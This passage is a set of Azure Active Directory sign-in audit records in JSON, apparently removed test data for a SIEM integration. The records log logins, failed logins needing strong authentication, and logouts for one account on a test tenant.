"00000003-0000-0000-c000-000000000000", "ModifiedProperties": [], "ResultStatus": "Succeeded", "IntraSystemId": "01c15486-46e2-487a-91f5-11445da0b600", "ExtendedProperties": [{"Name": "UserAgent", "Value": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0"}, {"Name": "UserAuthenticationMethod", "Value": "9"}, {"Name": "RequestType", "Value": "OAuth2:Authorize"}, {"Name": "ResultStatusDetail", "Value": "Redirect"}, {"Name": "KeepMeSignedIn", "Value": "False"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "UserLoggedIn", "Id": "3f6c8eb2-c64b-4dc5-b8fd-be252f8e09c2"}
-{"InterSystemsId": "68d7eaa4-aa57-4508-9792-09e80c911aa1", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-10T15:13:42", "Actor": [{"Type": 0, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 15, "ActorIpAddress": "83.57.233.151", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "83.57.233.151", "ApplicationId": "89bee1f7-5e6e-4d8a-9f3d-ecd601259da7", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 0, "ID": "0f698dd4-f011-4d23-a33e-b36416dcb1e6"}], "ObjectId": "0f698dd4-f011-4d23-a33e-b36416dcb1e6", "ModifiedProperties": [], "ResultStatus": "Succeeded", "IntraSystemId": "1590b91f-bffe-4cd8-9028-de52692f5400", "ExtendedProperties": [{"Name": "UserAgent", "Value": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0"}, {"Name": "UserAuthenticationMethod", "Value": "9"}, {"Name": "RequestType", "Value": "OAuth2:Authorize"}, {"Name": "ResultStatusDetail", "Value": "Redirect"}, {"Name": "KeepMeSignedIn", "Value": "False"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "UserLoggedIn", "Id": "b290b902-b6f2-49f6-b7f8-ea1541d85c8c"}
-{"InterSystemsId": "6ae96167-2df2-425c-9f91-27e6345eb782", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-07T16:42:59", "Actor": [{"Type": 0, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 15, "ActorIpAddress": "213.97.47.133", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "213.97.47.133", "LogonError": "FlowTokenExpired", "ApplicationId": "4345a7b9-9a63-4910-a426-35363201d503", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 0, "ID": "00000002-0000-0000-c000-000000000000"}], "ObjectId": "00000002-0000-0000-c000-000000000000", "ModifiedProperties": [], "ResultStatus": "Succeeded", "IntraSystemId": "f54da4fe-0a54-45f3-b6ea-39f873eb6000", "ExtendedProperties": [{"Name": "UserAgent", "Value": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0"}, {"Name": "RequestType", "Value": "Login:login"}, {"Name": "ResultStatusDetail", "Value": "Success"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "UserLoggedIn", "Id": "b0c1c4a7-c6db-4f14-b628-54e37a7a6785"}
-{"InterSystemsId": "6ae96167-2df2-425c-9f91-27e6345eb782", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-07T16:43:02", "Actor": [{"Type": 0, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 15, "ActorIpAddress": "213.97.47.133", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "213.97.47.133", "LogonError": "UserStrongAuthClientAuthNRequiredInterrupt", "ApplicationId": "4345a7b9-9a63-4910-a426-35363201d503", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 0, "ID": "00000002-0000-0000-c000-000000000000"}], "ObjectId": "00000002-0000-0000-c000-000000000000", "ModifiedProperties": [], "ResultStatus": "Failed", "IntraSystemId": "7fa5e138-ac87-4063-a278-56c6c6965e00", "ExtendedProperties": [{"Name": "UserAgent", "Value": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0"}, {"Name": "FlowTokenScenario", "Value": "Login"}, {"Name": "UserAuthenticationMethod", "Value": "1"}, {"Name": "RequestType", "Value": "Login:login"}, {"Name": "ResultStatusDetail", "Value": "Success"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "UserLoginFailed", "Id": "82d834e4-f6f2-476a-902e-e1e9fd6f87d8"}
-{"InterSystemsId": "6b9a8662-857f-45e4-bbb2-d106d5aab41e", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-12T21:38:19", "Actor": [{"Type": 0, "ID": "Unknown"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 15, "ActorIpAddress": "79.159.10.151", "UserId": "Unknown", "UserType": 5, "UserKey": "Not Available", "ClientIP": "79.159.10.151", "LogonError": "None", "ApplicationId": "", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 0, "ID": "Unknown"}], "ObjectId": "Unknown", "ModifiedProperties": [], "ResultStatus": "Succeeded", "IntraSystemId": "0fee3b91-5e56-45f6-9b3c-792602b1e500", "ExtendedProperties": [{"Name": "UserAgent", "Value": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0"}, {"Name": "RequestType", "Value": "OAuth2:Logout"}, {"Name": "ResultStatusDetail", "Value": "Success"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "UserLoggedIn", "Id": "e5e2c41a-55ea-4681-9d64-78ddd7145bd2"}
-{"InterSystemsId": "6bab76a8-98bd-42e4-b722-a31fe81b030a", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-07T16:43:40", "Actor": [{"Type": 0, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 15, "ActorIpAddress": "213.97.47.133", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "213.97.47.133", "ApplicationId": "89bee1f7-5e6e-4d8a-9f3d-ecd601259da7", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 0, "ID": "5f09333a-842c-47da-a157-57da27fcbca5"}], "ObjectId": "5f09333a-842c-47da-a157-57da27fcbca5", "ModifiedProperties": [], "ResultStatus": "Succeeded", "IntraSystemId": "c3ebcde8-62f6-4cc4-8e0c-c11c08e76100", "ExtendedProperties": [{"Name": "UserAgent", "Value": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0"}, {"Name": "UserAuthenticationMethod", "Value": "9"}, {"Name": "RequestType", "Value": "OAuth2:Authorize"}, {"Name": "ResultStatusDetail", "Value": "Redirect"}, {"Name": "KeepMeSignedIn", "Value": "True"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "UserLoggedIn", "Id": "2a23206a-2f5d-4cb7-aeb8-f285d10e6f80"}
-{"InterSystemsId": "6fee997e-1b2a-4a95-a8be-ea85642ed652", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-09T15:30:58", "Actor": [{"Type": 0, "ID": "Unknown"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 15, "ActorIpAddress": "83.57.233.151", "UserId": "Unknown", "UserType": 5, "UserKey": "Not Available", "ClientIP": "83.57.233.151", "LogonError": "None", "ApplicationId": "", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 0, "ID": "Unknown"}], "ObjectId": "Unknown", "ModifiedProperties": [], "ResultStatus": "Succeeded", "IntraSystemId": "8b270c82-1240-4a0a-ac15-1e1116261400", "ExtendedProperties": [{"Name": "UserAgent", "Value": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0"}, {"Name": "RequestType", "Value": "OAuth2:Logout"}, {"Name": "ResultStatusDetail", "Value": "Success"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "UserLoggedIn", "Id": "c0a0d198-825b-4e39-b868-0a7b0552b209"}
-{"InterSystemsId": "6fee997e-1b2a-4a95-a8be-ea85642ed652", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-09T15:31:33", "Actor": [{"Type": 0, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 15, "ActorIpAddress": "83.57.233.151", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "83.57.233.151", "LogonError": "UserStrongAuthClientAuthNRequiredInterrupt", "ApplicationId": "c44b4083-3bb0-49c1-b47d-974e53cbdf3c", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 0, "ID": "797f4846-ba00-4fd7-ba43-dac1f8f63013"}], "ObjectId": "797f4846-ba00-4fd7-ba43-dac1f8f63013", "ModifiedProperties": [], "ResultStatus": "Failed", "IntraSystemId": "b0faaf7a-913e-4a93-8ccc-ecfaa2b42400", "ExtendedProperties": [{"Name": "UserAgent", "Value": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0"}, {"Name": "FlowTokenScenario", "Value": "Login"}, {"Name": "UserAuthenticationMethod", "Value": "1"}, {"Name": "RequestType", "Value": "Login:login"}, {"Name": "ResultStatusDetail", "Value": "Success"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "UserLoginFailed", "Id": "52b07191-3887-40fb-a001-f4122b0851d1"}
-{"InterSystemsId": "6fee997e-1b2a-4a95-a8be-ea85642ed652", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-10T15:14:25", "Actor": [{"Type": 0, "ID": "Unknown"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 15, "ActorIpAddress": "83.57.233.151", "UserId": "Unknown", "UserType": 5, "UserKey": "Not Available", "ClientIP": "83.57.233.151", "LogonError": "None", "ApplicationId": "", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 0, "ID": "Unknown"}], "ObjectId": "Unknown", "ModifiedProperties": [], "ResultStatus": "Succeeded", "IntraSystemId": "d949d6c2-472e-4901-bd70-96cbfe534c00", "ExtendedProperties": [{"Name": "UserAgent", "Value": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0"}, {"Name": "RequestType", "Value": "OAuth2:Logout"}, {"Name": "ResultStatusDetail", "Value": "Success"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "UserLoggedIn", "Id": "c62fa78d-daab-494e-a638-8321ebd71b9e"}
-{"InterSystemsId": "6fee997e-1b2a-4a95-a8be-ea85642ed652", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-10T15:14:51", "Actor": [{"Type": 0, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 15, "ActorIpAddress": "83.57.233.151", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "83.57.233.151", "LogonError": "UserStrongAuthClientAuthNRequiredInterrupt", "ApplicationId": "c44b4083-3bb0-49c1-b47d-974e53cbdf3c", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 0, "ID": "797f4846-ba00-4fd7-ba43-dac1f8f63013"}], "ObjectId": "797f4846-ba00-4fd7-ba43-dac1f8f63013", "ModifiedProperties": [], "ResultStatus": "Failed", "IntraSystemId": "42c7ec91-1e2f-4505-b728-3a165b244f00", "ExtendedProperties": [{"Name": "UserAgent", "Value": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0"}, {"Name": "FlowTokenScenario", "Value": "Login"}, {"Name": "UserAuthenticationMethod", "Value": "1"}, {"Name": "RequestType", "Value": "Login:login"}, {"Name": "ResultStatusDetail", "Value": "Success"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "UserLoginFailed", "Id": "73c76212-8120-4e21-a383-c80d8327b606"}
-{"InterSystemsId": "6fee997e-1b2a-4a95-a8be-ea85642ed652", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-10T15:29:56", "Actor": [{"Type": 0, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 15, "ActorIpAddress": "83.57.233.151", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "83.57.233.151", "ApplicationId": "c44b4083-3bb0-49c1-b47d-974e53cbdf3c", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 0, "ID": "797f4846-ba00-4fd7-ba43-dac1f8f63013"}], "ObjectId": "797f4846-ba00-4fd7-ba43-dac1f8f63013", "ModifiedProperties": [], "ResultStatus": "Succeeded", "IntraSystemId": "8b8e8663-8a8c-4959-a692-e3eece085300", "ExtendedProperties": [{"Name": "UserAgent", "Value": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0"}, {"Name": "UserAuthenticationMethod", "Value": "9"}, {"Name": "RequestType", "Value": "OAuth2:Authorize"}, {"Name": "ResultStatusDetail", "Value": "Success"}, {"Name": "KeepMeSignedIn", "Value": "False"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "UserLoggedIn", "Id": "29f94716-3717-4671-962e-9c739b764f07"}
-{"InterSystemsId": "6fee997e-1b2a-4a95-a8be-ea85642ed652", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-11T16:51:23", "Actor": [{"Type": 0, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 15, "ActorIpAddress": "83.57.233.151", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "83.57.233.151", "ApplicationId": "c44b4083-3bb0-49c1-b47d-974e53cbdf3c", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 0, "ID": "797f4846-ba00-4fd7-ba43-dac1f8f63013"}], "ObjectId": "797f4846-ba00-4fd7-ba43-dac1f8f63013", "ModifiedProperties": [], "ResultStatus": "Succeeded", "IntraSystemId": "361dd87e-3bc9-4f0a-b236-ed7365e28d00", "ExtendedProperties": [{"Name": "UserAgent", "Value": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0"}, {"Name": "UserAuthenticationMethod", "Value": "9"}, {"Name": "RequestType", "Value": "OAuth2:Authorize"}, {"Name": "ResultStatusDetail", "Value": "Success"}, {"Name": "KeepMeSignedIn", "Value": "False"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "UserLoggedIn", "Id": "17d02385-1e30-45b7-949c-4d3dd549a0e7"}
-{"InterSystemsId": "6fee997e-1b2a-4a95-a8be-ea85642ed652", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-12T21:39:45", "Actor": [{"Type": 0, "ID": "Unknown"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 15, "ActorIpAddress": "79.159.10.151", "UserId": "Unknown", "UserType": 5, "UserKey": "Not Available", "ClientIP": "79.159.10.151", "LogonError": "None", "ApplicationId": "", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 0, "ID": "Unknown"}], "ObjectId": "Unknown", "ModifiedProperties": [], "ResultStatus": "Succeeded", "IntraSystemId": "32b4cec1-00eb-44ea-be73-adc82387db00", "ExtendedProperties": [{"Name": "UserAgent", "Value": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0"}, {"Name": "RequestType", "Value": "OAuth2:Logout"}, {"Name": "ResultStatusDetail", "Value": "Success"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "UserLoggedIn", "Id": "e3346dd0-ecf6-4676-8765-365c7370b6fe"}
-{"InterSystemsId": "6fee997e-1b2a-4a95-a8be-ea85642ed652", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-12T21:40:16", "Actor": [{"Type": 0, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 15, "ActorIpAddress": "79.159.10.151", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "79.159.10.151", "LogonError": "UserStrongAuthClientAuthNRequiredInterrupt", "ApplicationId": "c44b4083-3bb0-49c1-b47d-974e53cbdf3c", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 0, "ID": "797f4846-ba00-4fd7-ba43-dac1f8f63013"}], "ObjectId": "797f4846-ba00-4fd7-ba43-dac1f8f63013", "ModifiedProperties": [], "ResultStatus": "Failed", "IntraSystemId": "a063e495-5883-4837-8186-582817fdd500", "ExtendedProperties": [{"Name": "UserAgent", "Value": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0"}, {"Name": "FlowTokenScenario", "Value": "Login"}, {"Name": "UserAuthenticationMethod", "Value": "1"}, {"Name": "RequestType", "Value": "Login:login"}, {"Name": "ResultStatusDetail", "Value": "Success"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "UserLoginFailed", "Id": "a772fd76-847f-4703-90f1-37eb81c9f392"}
-{"InterSystemsId": "7766ac63-ae7f-43e6-868a-a5422a96fd8b", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-08T14:33:52", "Actor": [{"Type": 0, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 15, "ActorIpAddress": "37.29.234.179", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "37.29.234.179", "ApplicationId": "89bee1f7-5e6e-4d8a-9f3d-ecd601259da7", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 0, "ID": "5f09333a-842c-47da-a157-57da27fcbca5"}], "ObjectId": "5f09333a-842c-47da-a157-57da27fcbca5", "ModifiedProperties": [], "ResultStatus": "Succeeded", "IntraSystemId": "adc9d69c-8ae6-41c7-b685-331453060a00", "ExtendedProperties": [{"Name": "UserAgent", "Value": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0"}, {"Name": "UserAuthenticationMethod", "Value": "9"}, {"Name": "RequestType", "Value": "OAuth2:Authorize"}, {"Name": "ResultStatusDetail", "Value": "Redirect"}, {"Name": "KeepMeSignedIn", "Value": "True"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "UserLoggedIn", "Id": "487e4f43-53db-4d6f-a314-5355746d4853"}
-{"InterSystemsId": "781c1055-e731-48ee-a806-c3f39ba160e3", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-12T10:53:24", "Actor": [{"Type": 0, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 15, "ActorIpAddress": "79.159.10.151", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "79.159.10.151", "ApplicationId": "89bee1f7-5e6e-4d8a-9f3d-ecd601259da7", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 0, "ID": "5f09333a-842c-47da-a157-57da27fcbca5"}], "ObjectId": "5f09333a-842c-47da-a157-57da27fcbca5", "ModifiedProperties": [], "ResultStatus": "Succeeded", "IntraSystemId": "e7fe21ea-ec03-46dd-b272-0a72ebbeac00", "ExtendedProperties": [{"Name": "UserAgent", "Value": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0"}, {"Name": "UserAuthenticationMethod", "Value": "9"}, {"Name": "RequestType", "Value": "OAuth2:Authorize"}, {"Name": "ResultStatusDetail", "Value": "Redirect"}, {"Name": "KeepMeSignedIn", "Value": "False"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "UserLoggedIn", "Id": "41f6b2dc-4db6-444c-93d9-829a842b87e2"}
-{"InterSystemsId": "82b07417-7b33-4531-952f-d3f719e2356a", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-07T16:43:22", "Actor": [{"Type": 0, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 15, "ActorIpAddress": "213.97.47.133", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "213.97.47.133", "ApplicationId": "00000002-0000-0ff1-ce00-000000000000", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 0, "ID": "00000002-0000-0ff1-ce00-000000000000"}], "ObjectId": "00000002-0000-0ff1-ce00-000000000000", "ModifiedProperties": [], "ResultStatus": "Succeeded", "IntraSystemId": "280b3410-9d51-4ce3-952d-5bba0bea6600", "ExtendedProperties": [{"Name": "UserAgent", "Value": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0"}, {"Name": "UserAuthenticationMethod", "Value": "9"}, {"Name": "RequestType", "Value": "OAuth2:Authorize"}, {"Name": "ResultStatusDetail", "Value": "Success"}, {"Name": "KeepMeSignedIn", "Value": "True"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "UserLoggedIn", "Id": "ec9fa29b-6201-456d-b228-ca1759e0bf6c"}
-{"InterSystemsId": "8571fe85-eb4a-430d-b468-97900e344923", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-06T09:28:04", "Actor": [{"Type": 0, "ID": "Unknown"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 15, "ActorIpAddress": "83.57.233.151", "UserId": "Unknown", "UserType": 5, "UserKey": "Not Available", "ClientIP": "83.57.233.151", "LogonError": "None", "ApplicationId": "", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 0, "ID": "Unknown"}], "ObjectId": "Unknown", "ModifiedProperties": [], "ResultStatus": "Succeeded", "IntraSystemId": "d239e473-6687-4ff9-ac65-0e3c59961600", "ExtendedProperties": [{"Name": "UserAgent", "Value": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0"}, {"Name": "RequestType", "Value": "OAuth2:Logout"}, {"Name": "ResultStatusDetail", "Value": "Success"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "UserLoggedIn", "Id": "e988fd90-2eff-4ad7-9f02-030a9d73ad6e"}
-{"InterSystemsId": "8d662bc0-0011-424d-a7dc-56bfc5a142b4", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-12T21:38:35", "Actor": [{"Type": 0, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 15, "ActorIpAddress": "79.159.10.151", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "79.159.10.151", "ApplicationId": "00000002-0000-0ff1-ce00-000000000000", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 0, "ID": "00000002-0000-0ff1-ce00-000000000000"}], "ObjectId": "00000002-0000-0ff1-ce00-000000000000", "ModifiedProperties": [], "ResultStatus": "Succeeded", "IntraSystemId": "d0a4e1ed-206d-4602-aaae-406a02c5c300", "ExtendedProperties": [{"Name": "UserAgent", "Value": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0"}, {"Name": "UserAuthenticationMethod", "Value": "9"}, {"Name": "RequestType", "Value": "OAuth2:Authorize"}, {"Name": "ResultStatusDetail", "Value": "Success"}, {"Name": "KeepMeSignedIn", "Value": "False"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "UserLoggedIn", "Id": "3cbf15a5-84d0-4b0e-ba8e-c3ed43477293"}
